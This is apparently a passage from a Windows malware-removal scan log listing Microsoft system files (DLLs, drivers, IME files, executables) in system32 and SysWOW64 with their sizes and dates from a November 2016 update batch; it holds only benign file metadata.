2016-11-09 15:50 - 2016-10-27 12:49 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2016-11-09 15:50 - 2016-10-27 12:46 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-11-09 15:50 - 2016-10-27 12:46 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2016-11-09 15:50 - 2016-10-27 12:44 - 02131456 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-11-09 15:50 - 2016-10-27 12:44 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2016-11-09 15:50 - 2016-10-27 12:17 - 15257088 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-11-09 15:50 - 2016-10-27 12:16 - 02920448 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-11-09 15:50 - 2016-10-27 12:03 - 01543680 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-11-09 15:50 - 2016-10-27 11:54 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-11-09 15:50 - 2016-10-27 10:05 - 20304896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-11-09 15:50 - 2016-10-25 10:02 - 03219456 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-11-09 15:50 - 2016-10-22 12:54 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2016-11-09 15:50 - 2016-10-22 12:36 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2016-11-09 15:50 - 2016-10-22 12:36 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2016-11-09 15:50 - 2016-10-22 12:35 - 00498688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-11-09 15:50 - 2016-10-22 12:35 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2016-11-09 15:50 - 2016-10-22 12:34 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2016-11-09 15:50 - 2016-10-22 12:27 - 02287616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-11-09 15:50 - 2016-10-22 12:27 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-11-09 15:50 - 2016-10-22 12:26 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2016-11-09 15:50 - 2016-10-22 12:22 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2016-11-09 15:50 - 2016-10-22 12:21 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-11-09 15:50 - 2016-10-22 12:21 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2016-11-09 15:50 - 2016-10-22 12:20 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2016-11-09 15:50 - 2016-10-22 12:09 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2016-11-09 15:50 - 2016-10-22 12:04 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2016-11-09 15:50 - 2016-10-22 12:03 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2016-11-09 15:50 - 2016-10-22 11:59 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2016-11-09 15:50 - 2016-10-22 11:58 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2016-11-09 15:50 - 2016-10-22 11:56 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2016-11-09 15:50 - 2016-10-22 11:54 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2016-11-09 15:50 - 2016-10-22 11:46 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2016-11-09 15:50 - 2016-10-22 11:45 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-11-09 15:50 - 2016-10-22 11:44 - 04608000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-11-09 15:50 - 2016-10-22 11:43 - 02055680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-11-09 15:50 - 2016-10-22 11:43 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2016-11-09 15:50 - 2016-10-22 11:30 - 13654016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-11-09 15:50 - 2016-10-22 11:12 - 02444800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-11-09 15:50 - 2016-10-22 11:09 - 01312256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-11-09 15:50 - 2016-10-22 11:09 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2016-11-09 15:50 - 2016-10-15 10:31 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2016-11-09 15:50 - 2016-10-15 10:31 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2016-11-09 15:50 - 2016-10-15 10:13 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2016-11-09 15:50 - 2016-10-15 10:13 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll
2016-11-09 15:50 - 2016-10-11 10:37 - 00370920 _____ (Microsoft Corporation) C:\Windows\system32\clfs.sys
2016-11-09 15:50 - 2016-10-11 10:31 - 01148416 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10.IME
2016-11-09 15:50 - 2016-10-11 10:31 - 01068544 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2016-11-09 15:50 - 2016-10-11 10:31 - 00878080 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10K.DLL
2016-11-09 15:50 - 2016-10-11 10:31 - 00457216 _____ (Microsoft Corporation) C:\Windows\system32\imkr80.ime
2016-11-09 15:50 - 2016-10-11 10:31 - 00246784 _____ (Microsoft Corporation) C:\Windows\system32\input.dll
2016-11-09 15:50 - 2016-10-11 10:31 - 00176128 _____ (Microsoft Corporation) C:\Windows\system32\tintlgnt.ime
2016-11-09 15:50 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\quick.ime
2016-11-09 15:50 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\qintlgnt.ime
2016-11-09 15:50 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\phon.ime
2016-11-09 15:50 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\cintlgnt.ime
2016-11-09 15:50 - 2016-10-11 10:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\chajei.ime
2016-11-09 15:50 - 2016-10-11 10:31 - 00132608 _____ (Microsoft Corporation) C:\Windows\system32\pintlgnt.ime
2016-11-09 15:50 - 2016-10-11 10:18 - 01027584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IMJP10.IME
2016-11-09 15:50 - 2016-10-11 10:18 - 00829952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll
2016-11-09 15:50 - 2016-10-11 10:18 - 00701440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IMJP10K.DLL
2016-11-09 15:50 - 2016-10-11 10:18 - 00430080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imkr80.ime
2016-11-09 15:50 - 2016-10-11 10:18 - 00202240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\input.dll
2016-11-09 15:50 - 2016-10-11 10:18 - 00126976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tintlgnt.ime
2016-11-09 15:50 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quick.ime
2016-11-09 15:50 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qintlgnt.ime
2016-11-09 15:50 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\phon.ime
2016-11-09 15:50 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cintlgnt.ime
2016-11-09 15:50 - 2016-10-11 10:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\chajei.ime
2016-11-09 15:50 - 2016-10-11 10:18 - 00090112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pintlgnt.ime
2016-11-09 15:50 - 2016-10-11 08:33 - 00187392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIAnimation.dll
2016-11-09 15:50 - 2016-10-11 08:06 - 00221184 _____ (Microsoft Corporation) C:\Windows\system32\UIAnimation.dll
2016-11-09 15:50 - 2016-10-10 10:38 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-11-09 15:50 - 2016-10-10 10:38 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2016-11-09 15:50 - 2016-10-10 10:34 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2016-11-09 15:50 - 2016-10-10 10:34 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2016-11-09 15:50 - 2016-10-10 10:34 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2016-11-09 15:50 - 2016-10-10 10:34 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2016-11-09 15:50 - 2016-10-10 10:33 - 01462272 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-11-09 15:50 - 2016-10-10 10:33 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2016-11-09 15:50 - 2016-10-10 10:33 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-11-09 15:50 - 2016-10-10 10:33 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2016-11-09 15:50 - 2016-10-10 10:33 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2016-11-09 15:50 - 2016-10-10 10:33 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2016-11-09 15:50 - 2016-10-10 10:33 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-11-09 15:50 - 2016-10-10 10:33 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2016-11-09 15:50 - 2016-10-10 10:33 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2016-11-09 15:50 - 2016-10-10 10:33 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2016-11-09 15:50 - 2016-10-10 10:33 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2016-11-09 15:50 - 2016-10-10 10:33 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2016-11-09 15:50 - 2016-10-10 10:33 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2016-11-09 15:50 - 2016-10-10 10:33 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2016-11-09 15:50 - 2016-10-10 10:16 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2016-11-09 15:50 - 2016-10-10 10:16 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2016-11-09 15:50 - 2016-10-10 10:16 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-11-09 15:50 - 2016-10-10 10:16 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2016-11-09 15:50 - 2016-10-10 10:16 - 00261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-11-09 15:50 - 2016-10-10 10:16 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2016-11-09 15:50 - 2016-10-10 10:16 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2016-11-09 15:50 - 2016-10-10 10:16 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2016-11-09 15:50 - 2016-10-10 10:16 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2016-11-09 15:50 - 2016-10-10 10:16 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2016-11-09 15:50 - 2016-10-10 10:16 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2016-11-09 15:50 - 2016-10-10 10:16 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2016-11-09 15:50 - 2016-10-10 10:16 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2016-11-09 15:50 - 2016-10-10 10:16 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2016-11-09 15:50 - 2016-10-10 10:16 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2016-11-09 15:50 - 2016-10-10 10:02 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2016-11-09 15:50 - 2016-10-10 09:56 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-11-09 15:50 - 2016-10-10 09:55 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-11-09 15:50 - 2016-10-10 09:55 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2016-11-09 15:50 - 2016-10-10 09:55 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2016-11-09 15:50 - 2016-10-10 09:54 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2016-11-09 15:50 - 2016-10-10 09:50 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2016-11-09 15:50 - 2016-10-07 10:40 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2016-11-09 15:50 - 2016-10-07 10:37 - 05547752 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-11-09 15:50 - 2016-10-07 10:37 - 00706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2016-11-09 15:50 - 2016-10-07 10:35 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 03649536 _____ (Microsoft Corporation) C:\Windows\system32\MSVidCtl.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00877056 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:18 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2016-11-09 15:50 - 2016-10-07 10:18 - 03944680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2016-11-09 15:50 - 2016-10-07 10:15 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 02291712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSVidCtl.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00581632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:04 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2016-11-09 15:50 - 2016-10-07 10:04 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2016-11-09 15:50 - 2016-10-07 10:04 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2016-11-09 15:50 - 2016-10-07 10:01 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2016-11-09 15:50 - 2016-10-07 10:00 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2016-11-09 15:50 - 2016-10-07 09:56 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2016-11-09 15:50 - 2016-10-07 09:50 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2016-11-09 15:50 - 2016-10-07 09:50 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2016-11-09 15:50 - 2016-10-07 09:50 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2016-11-09 15:50 - 2016-10-07 09:50 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2016-11-09 15:50 - 2016-10-07 09:49 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 09:49 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 09:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 09:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2016-11-09 15:50 - 2016-10-05 09:54 - 00090112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bowser.sys
2016-11-09 15:50 - 2016-09-15 09:56 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\UtcResources.dll
2016-11-09 15:50 - 2016-09-13 10:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2016-11-09 15:50 - 2016-09-13 10:11 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2016-11-09 15:50 - 2016-09-09 13:20 - 00756736 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
